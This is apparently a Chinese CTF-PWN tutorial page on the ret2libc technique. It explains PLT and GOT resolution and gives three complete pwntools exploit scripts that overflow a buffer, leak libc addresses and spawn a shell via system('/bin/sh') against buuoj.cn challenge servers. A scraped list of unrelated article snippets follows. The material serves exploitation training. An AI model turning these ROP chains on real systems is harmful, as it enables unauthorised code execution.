CTF-PWN: ret2libc
plt表与got表是什么?
PLT
PLT (Procedure Linkage Table) 表在 ELF 文件中的代码段(.text)中,它看起来是这样的:
.plt:0x00400530 <__libc_start_main@plt>:jmp QWORD PTR [rip + 0x200602] # 0x601608 <__libc_start_main@got.plt>push 0x0jmp 0x4005100x00400540 <puts@plt>:jmp QWORD PTR [rip + 0x2005f2] # 0x601638 <puts@got.plt>push 0x1jmp 0x4005100x00400550 <printf@plt>:jmp QWORD PTR [rip + 0x2005e2] # 0x601648 <printf@got.plt>push 0x2jmp 0x400510; ... 其他外部函数的 PLT 条目
从上面的代码可以看到,PLT 表由多个条目组成,每个条目对应一个外部函数。每个条目的结构如下:
-
jmp指令:- 这条指令用于跳转到 GOT (Global Offset Table) 表中该函数的地址。
- 它实际上是跳转到 GOT 表中对应函数的条目。
-
push指令:- 这条指令将一个立即数压入栈中,这个立即数标识了该函数在 PLT 表中的索引。
-
jmp指令:- 这条指令跳转到 PLT 表的开头,即
0x400510。 - 这里是 PLT 表的一个通用部分,用于处理函数的首次调用。
- 这条指令跳转到 PLT 表的开头,即
当程序第一次调用一个外部函数时,会执行 PLT 表中该函数的条目。首先跳转到 GOT 表中该函数的条目,由于这是首次调用,GOT 表中保存的是一个特殊地址,会触发动态链接器的介入。动态链接器会查找该函数的实际地址,并将其写入 GOT 表中。之后,程序就可以直接从 GOT 表中获取该函数的地址,无需再次查找。
GOT
GOT (Global Offset Table) 表在 ELF 文件的数据段(.data)中,它看起来是这样的:
.got.plt:0x00601608 <__libc_start_main@got.plt>:0x00007ffff7a2d830 ; 这里存放了 __libc_start_main 函数的实际地址0x00601618 <__gmon_start__@got.plt>:0x0000000000000000 ; 这里初始值为 0,表示还未解析0x00601628 <__cxa_finalize@got.plt>:0x00007ffff7a12b10 ; 这里存放了 __cxa_finalize 函数的实际地址0x00601638 <puts@got.plt>:0x00007ffff7a68c10 ; 这里存放了 puts 函数的实际地址0x00601648 <printf@got.plt>:0x00007ffff7a57e50 ; 这里存放了 printf 函数的实际地址; ... 其他外部函数的 GOT 条目
从上面的代码可以看到,GOT 表由多个条目组成,每个条目对应一个外部函数。每个条目存放着该函数的实际地址。
当程序第一次调用一个外部函数时,会执行 PLT 表中该函数的条目。PLT 表中的跳转指令会跳转到 GOT 表中该函数的条目。由于这是首次调用,GOT 表中保存的是一个特殊地址,会触发动态链接器的介入。
动态链接器会查找该函数的实际地址,并将其写入 GOT 表中对应的条目。之后,程序就可以直接从 GOT 表中获取该函数的地址,无需再次查找。
需要注意的是,GOT 表中的某些条目可能初始值为 0,表示还未解析。比如 __gmon_start__@got.plt 就是这样的。这些条目可能在程序运行过程中才会被动态链接器填充。
通过理解 GOT 表的结构,我们可以在 pwn 题中利用 GOT 表进行各种漏洞利用技巧,如 GOT 表覆写、GOT 表泄露等。
调用流程
当程序第一次调用一个外部函数时,会触发动态链接器的介入。这个过程主要包括以下步骤:
-
程序跳转到 GOT 表:
- 程序在 PLT 表中查找到对应的外部函数,并跳转到 GOT 表中该函数的条目。
- 由于这是程序第一次调用该函数,GOT 表中保存的初始值通常为 0 或者一个特殊地址。
-
动态链接器被调用:
- 当 CPU 执行跳转指令时,发现 GOT 表中的值异常,就会触发动态链接器的介入。
-
动态链接器查找函数地址:
- 动态链接器会查找该外部函数的实际地址。它会在程序链接时指定的共享库中搜索该函数。
-
动态链接器填充 GOT 表:
- 动态链接器找到该函数的实际地址后,会将其写入到 GOT 表中对应的条目。
-
程序继续执行:
- 动态链接器完成填充 GOT 表后,程序就可以继续执行,并从 GOT 表中直接获取函数地址,无需再次查找。
一般步骤
- 1.获取足够的可控溢出区
- 2.使用函数输出任意函数.got地址,计算出libc基地址,system地址和
/bin/sh位置 - 2.按照题目架构调用约定构造system(‘/bin/sh’)
有效负载示例
x64
puts
from pwn import *
from LibcSearcher import LibcSearchercontext.arch = 'amd64'
context.log_level = 'debug'
pwn = ELF('./pwn')
libc = ELF('./libc')
rop1 = ROP(pwn)ret = rop1.ret
pad = 0x20 + 8
rop1.raw(b'a' * pad)
rop1.call('puts', [pwn.got['puts']])
rop1.call('main')
print(rop1.dump())
poc1 = rop1.chain()io = remote('node5.buuoj.cn', 28739)
io.recvuntil('this time?')
io.sendline(poc1)
io.recvuntil(b'Ok.See you!')
know_addr = packing.u64(io.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
print(hex(know_addr))'''
libc = LibcSearcher("puts", know_addr)
libc_base = know_addr - libc.dump("puts")
system_addr = libc_base + libc.dump("system")
bin_addr = libc_base + libc.dump("str_bin_sh")
'''libc_base = know_addr - libc.symbols['puts']
system_addr = libc_base + libc.symbols['system']
bin_addr = libc_base + next(libc.search(b'/bin/sh')) rop2 = ROP(pwn)
rop2.raw(b'a' * pad)
rop2.raw(ret)
rop2.call(system_addr, [bin_addr])
print(rop2.dump())
poc2 = rop2.chain()io.recvuntil('this time?')
io.sendline(poc2)
io.interactive()
write
from pwn import*
from LibcSearcher import*r=remote('node3.buuoj.cn',25003)
elf=ELF('./level3_x64')main_addr=0x40061a
pop_rdi=0x4006b3
pop_rsi_r15=0x4006b1write_got=elf.got['write']
write_plt=elf.plt['write']payload='a'*(0x80+8)+p64(pop_rdi)+p64(0)+p64(pop_rsi_r15)+p64(write_got)+p64(8)+p64(write_plt)+p64(main_addr)
r.recvuntil('\n')
r.sendline(payload)
write_addr=u64(r.recv(8))
print hex(write_addr)libc=LibcSearcher('write',write_addr)
offset=write_addr-libc.dump('write')
print hex(offset)system=offset+libc.dump('system')
bin_sh=offset+libc.dump('str_bin_sh')payload='a'*(0x80+8)+p64(pop_rdi)+p64(bin_sh)+p64(system)+p64(0)
r.sendline(payload)
r.interactive()
x86
write
from pwn import *
from LibcSearcher import LibcSearcher
context.arch = 'i386'
context.log_level = 'debug'
pwn = ELF('./pwn')
libc = ELF('./libc')
rop1 = ROP(pwn) pad = 0x88 + 4
rop1.raw(b'a' * pad)
rop1.call('write', [1, pwn.got['write'], 4])
rop1.call('main')
print(rop1.dump())
poc1 = rop1.chain() io = remote('node5.buuoj.cn', 25129)
io.sendline(poc1)
know_addr = packing.u32(io.recv(4)) libc = LibcSearcher("write",know_addr)
libc_base = know_addr - libc.dump("write")
system_addr = libc_base + libc.dump("system")
bin_addr = libc_base + libc.dump("str_bin_sh")'''
libc_base = know_addr - libc.symbols['write']
system_addr = libc_base + libc.symbols['system']
bin_addr = libc_base + next(libc.search(b'/bin/sh'))
'''rop2 = ROP(pwn)
rop2.raw(b'a' * pad)
rop2.call(system_addr,[bin_addr])
print(rop2.dump())
poc2 = rop2.chain() io.sendline(poc2)
io.interactive()
相关文章:
CTF-PWN: ret2libc
plt表与got表是什么? PLT PLT (Procedure Linkage Table) 表在 ELF 文件中的代码段(.text)中,它看起来是这样的: .plt:0x00400530 <__libc_start_mainplt>:jmp QWORD PTR [rip 0x200602] # 0x601608 <__libc_start_maingot.plt>push 0x0jmp 0x4005100…...
SickOs: 1.1靶场学习小记
学习环境 kali攻击机:Get Kali | Kali Linux vulnhub靶场:https://download.vulnhub.com/sickos/sick0s1.1.7z 靶场描述: 这次夺旗赛清晰地模拟了在安全环境下如何对网络实施黑客策略从而入侵网络的过程。这个虚拟机与我在进攻性安全认证专…...
【ArcGIS Pro实操第10期】统计某个shp文件中不同区域内的站点数
统计某个shp文件中不同区域内的站点数 方法 1:使用“空间连接 (Spatial Join)”工具方法 2:使用“点计数 (Point Count)”工具方法 3:通过“选择 (Select by Location)”统计方法 4:通过“Python 脚本 (ArcPy)”实现参考 在 ArcGI…...
JavaScript中类数组对象及其与数组的关系
JavaScript中类数组对象及其与数组的关系 1. 什么是类数组对象? 类数组对象是指那些具有 length 属性且可以通过非负整数索引访问元素的对象。虽然这些对象看起来像数组,但它们并不具备真正数组的所有特性,例如没有继承 Array.prototype 上…...
基础入门-Web应用架构搭建域名源码站库分离MVC模型解析受限对应路径
知识点: 1、基础入门-Web应用-域名上的技术要点 2、基础入门-Web应用-源码上的技术要点 3、基础入门-Web应用-数据上的技术要点 4、基础入门-Web应用-解析上的技术要点 5、基础入门-Web应用-平台上的技术要点 一、演示案例-域名差异-主站&分站&端口站&…...
C#:时间与时间戳的转换
1、将 DateTime 转换为 Unix 时间戳(秒) public static long DateTimeToUnixTimestamp(DateTime dateTime) {// 定义UTC纪元时间DateTime epochStart new DateTime(1970, 1, 1, 0, 0, 0, DateTimeKind.Utc);// 计算从UTC纪元时间到指定时间的总秒数Tim…...
QT的exec函数
在Qt框架中,exec()方法是QDialog类(及其子类)的一个成员函数,用于以模态(modal)方式显示对话框。当exec()被调用时,它会启动一个局部的事件循环,这个循环会阻塞对对话框之外的其他窗…...
Css—实现3D导航栏
一、背景 最近在其他的网页中看到了一个很有趣的3d效果,这个效果就是使用css3中的3D转换实现的,所以今天的内容就是3D的导航栏效果。那么话不多说,直接开始主要内容的讲解。 二、效果展示 三、思路解析 1、首先我们需要将这个导航使用一个大…...
树莓集团:以人工智能为核心,打造数字化生态运营新典范
在当今数字化浪潮席卷全球的背景下,各行各业都在积极探索数字化转型的路径。作为数字产业的领军者,树莓集团凭借其深厚的技术积累和创新理念,在人工智能、大数据、云计算等前沿技术领域不断突破,成功打造了一个以人工智能为核心的…...
2024年首届数证杯 初赛wp
“数证杯”电子数据取证分析大赛致力于成为全国第一大电子数据取证分析大赛,面向所有网络安全从业人员公开征集参赛选手。参赛选手根据所属行业报名参赛赛道,比赛设置冠军、亚军、季军奖。所涉及行业包括能源、金融、通信、取证、安全等企业以及各类司法…...
2017 NHOI小学(C++)
A. 吃西瓜(2017 NHOI小学 1) 问题描述: 炎热的夏天来的可真快,小花猫和编程兔决定去买一个又大又甜的西瓜。可是小花和编程兔是两只非常奇怪的动物,都是偶数的爱好者,它们希望把西瓜切成两半后,每一部分的…...
【一维DP】【三种解法】力扣983. 最低票价
在一个火车旅行很受欢迎的国度,你提前一年计划了一些火车旅行。在接下来的一年里,你要旅行的日子将以一个名为 days 的数组给出。每一项是一个从 1 到 365 的整数。 火车票有 三种不同的销售方式 : 一张 为期一天 的通行证售价为 costs[0] …...
【头歌实训:递归实现斐波那契数列】
头歌实训:递归实现斐波那契数列 文章目录 任务描述相关知识递归相关知识递归举例何时使用递归定义是递归的数据结构是递归的问题的求解方法是递归的 编程要求测试说明源代码: 任务描述 本关任务:递归求解斐波那契数列。 相关知识 为了完成…...
IntelliJ IDEA配置(mac版本)
用惯了eclipse开发java的小伙伴们,初次接触IntelliJ IDEA可能会和我一样,多少有些不适感,在使用过程中总想着eclipse得对应功能。 接下来,我就总结下我日常开发中遇到的常用配置(不包括快捷键,我认为每个人…...
CSAPP Cache Lab(缓存模拟器)
前言 理解高速缓存对 C 程序性能的影响,通过两部分实验达成:编写高速缓存模拟器;优化矩阵转置函数以减少高速缓存未命中次数。Part A一开始根本不知道要做什么,慢慢看官方文档,以及一些博客,和B站视频&…...
【机器学习】机器学习的基本分类-监督学习-逻辑回归-对数似然损失函数(Log-Likelihood Loss Function)
对数似然损失函数(Log-Likelihood Loss Function) 对数似然损失函数是机器学习和统计学中广泛使用的一种损失函数,特别是在分类问题(例如逻辑回归、神经网络)中应用最为广泛。它基于最大似然估计原理,通过…...
51c自动驾驶~合集35
我自己的原文哦~ https://blog.51cto.com/whaosoft/12206500 #纯视觉方案的智驾在大雾天还能用吗? 碰上大雾天气,纯视觉方案是如何识别车辆和障碍物的呢? 如果真的是纯纯的,特头铁的那种纯视觉方案的话。 可以简单粗暴的理解为…...
网络安全体系与网络安全模型
4.1 网络安全体系概述 4.1.1 网络安全体系概述 一般面言,网络安全体系是网络安全保障系统的最高层概念抽象,是由各种网络安全单元按照一定的规则组成的,共同实现网络安全的目标。网络安全体系包括法律法规政策文件、安全策略、组织管理、技术…...
antd table 自定义表头过滤表格内容
注意:该功能只能过滤可一次性返回全部数据的表格,通过接口分页查询的请自主按照需求改动哈~ 实现步骤: 1.在要过滤的列表表头增加过滤图标,点击图标显示浮窗 2.浮窗内显示整列可选选项,通过勾选单选或者全选、搜索框来…...
Elasticsearch实战:从搜索到数据分析的全面应用指南
Elasticsearch(简称 ES)是一个强大的分布式搜索引擎和分析工具,它能够快速处理海量数据,并提供全文检索、结构化搜索、数据分析等功能。在现代系统中,它不仅是搜索的核心组件,也是数据分析的有力工具。 本文…...
生成xcframework
打包 XCFramework 的方法 XCFramework 是苹果推出的一种多平台二进制分发格式,可以包含多个架构和平台的代码。打包 XCFramework 通常用于分发库或框架。 使用 Xcode 命令行工具打包 通过 xcodebuild 命令可以打包 XCFramework。确保项目已经配置好需要支持的平台…...
CVPR 2025 MIMO: 支持视觉指代和像素grounding 的医学视觉语言模型
CVPR 2025 | MIMO:支持视觉指代和像素对齐的医学视觉语言模型 论文信息 标题:MIMO: A medical vision language model with visual referring multimodal input and pixel grounding multimodal output作者:Yanyuan Chen, Dexuan Xu, Yu Hu…...
VB.net复制Ntag213卡写入UID
本示例使用的发卡器:https://item.taobao.com/item.htm?ftt&id615391857885 一、读取旧Ntag卡的UID和数据 Private Sub Button15_Click(sender As Object, e As EventArgs) Handles Button15.Click轻松读卡技术支持:网站:Dim i, j As IntegerDim cardidhex, …...
循环冗余码校验CRC码 算法步骤+详细实例计算
通信过程:(白话解释) 我们将原始待发送的消息称为 M M M,依据发送接收消息双方约定的生成多项式 G ( x ) G(x) G(x)(意思就是 G ( x ) G(x) G(x) 是已知的)࿰…...
UDP(Echoserver)
网络命令 Ping 命令 检测网络是否连通 使用方法: ping -c 次数 网址ping -c 3 www.baidu.comnetstat 命令 netstat 是一个用来查看网络状态的重要工具. 语法:netstat [选项] 功能:查看网络状态 常用选项: n 拒绝显示别名&#…...
【SQL学习笔记1】增删改查+多表连接全解析(内附SQL免费在线练习工具)
可以使用Sqliteviz这个网站免费编写sql语句,它能够让用户直接在浏览器内练习SQL的语法,不需要安装任何软件。 链接如下: sqliteviz 注意: 在转写SQL语法时,关键字之间有一个特定的顺序,这个顺序会影响到…...
Qwen3-Embedding-0.6B深度解析:多语言语义检索的轻量级利器
第一章 引言:语义表示的新时代挑战与Qwen3的破局之路 1.1 文本嵌入的核心价值与技术演进 在人工智能领域,文本嵌入技术如同连接自然语言与机器理解的“神经突触”——它将人类语言转化为计算机可计算的语义向量,支撑着搜索引擎、推荐系统、…...
python爬虫:Newspaper3k 的详细使用(好用的新闻网站文章抓取和解析的Python库)
更多内容请见: 爬虫和逆向教程-专栏介绍和目录 文章目录 一、Newspaper3k 概述1.1 Newspaper3k 介绍1.2 主要功能1.3 典型应用场景1.4 安装二、基本用法2.2 提取单篇文章的内容2.2 处理多篇文档三、高级选项3.1 自定义配置3.2 分析文章情感四、实战案例4.1 构建新闻摘要聚合器…...
JUC笔记(上)-复习 涉及死锁 volatile synchronized CAS 原子操作
一、上下文切换 即使单核CPU也可以进行多线程执行代码,CPU会给每个线程分配CPU时间片来实现这个机制。时间片非常短,所以CPU会不断地切换线程执行,从而让我们感觉多个线程是同时执行的。时间片一般是十几毫秒(ms)。通过时间片分配算法执行。…...
python执行测试用例,allure报乱码且未成功生成报告
allure执行测试用例时显示乱码:‘allure’ �����ڲ����ⲿ���Ҳ���ǿ�&am…...
